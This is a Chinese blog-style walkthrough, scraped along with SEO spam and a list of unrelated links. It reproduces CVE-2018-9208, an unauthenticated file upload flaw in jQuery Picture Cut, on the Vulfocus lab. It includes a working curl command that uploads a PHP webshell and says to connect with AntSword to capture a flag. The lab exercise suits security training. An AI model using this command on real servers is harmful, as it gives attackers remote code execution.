当前位置: 首页 > news >正文

国外网站的设计风格枣庄seo外包

国外网站的设计风格,枣庄seo外包,电商企业网站建设,竹子建设网站jquery-picture-cut 任意文件上传_(CVE-2018-9208) 漏洞信息 jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞 描述 ​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap…

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

http://www.yayakq.cn/news/85423/

相关文章:

  • 网站页面设计模板网站建设谈单技巧
  • 南昌网站建设模板文档网站建设栏目设置
  • 网站建设的数据库连接沈阳做网站比较好的公司
  • 邯郸网站建设策划方案广州住房和城乡建设厅网站首页
  • 网站平台建设技术基础广州17网
  • 软件下载网站怎么赚钱单职业传奇手机手游版
  • wordpress vue网站北仑网站建设网站
  • 单页面网站怎么优化网站 空间 下载
  • 做一网站要什么时候开始潍坊大型做网站建设的公司
  • 网站建设广州白云创意做网站公司
  • 武昌网站建设哪家便宜广州网站建设360元
  • 做招聘网站做服务器多少钱家具网站建设规划
  • 遵化手机网站设计手机网站策划
  • 婚纱网站设计首页营销行网站建设
  • 什么都不懂做网站网站开发工具设备要求
  • 网站制作文案电子商城商务平台
  • 温州手机网站制作网站分页效果
  • 备案的网站每年都要备案么长沙建站挺找有为太极
  • 网站建设影音先锋网址网站开发调用别人网站的组件
  • 汶上网站开发wordpress添加语系
  • 凡客网站建站教程中山seo扣费
  • 河北云网站建设苏州网站建设设计
  • iis7.5添加网站上海工商注册网官网
  • 做网站-信科网络网站规划与建设 ppt
  • 一个好的网站怎么建设公众号推广合作平台
  • 定制网站与模板网站的主要区别网站建设 服务器主机配置
  • 国外设计类网站有哪些WordPress 游戏
  • 健身网站的建设方案江门网站建设推广策划
  • 简述企业网站的建设过程上海优化外包公司
  • 用别人网站做app的危害合购吧登录WordPress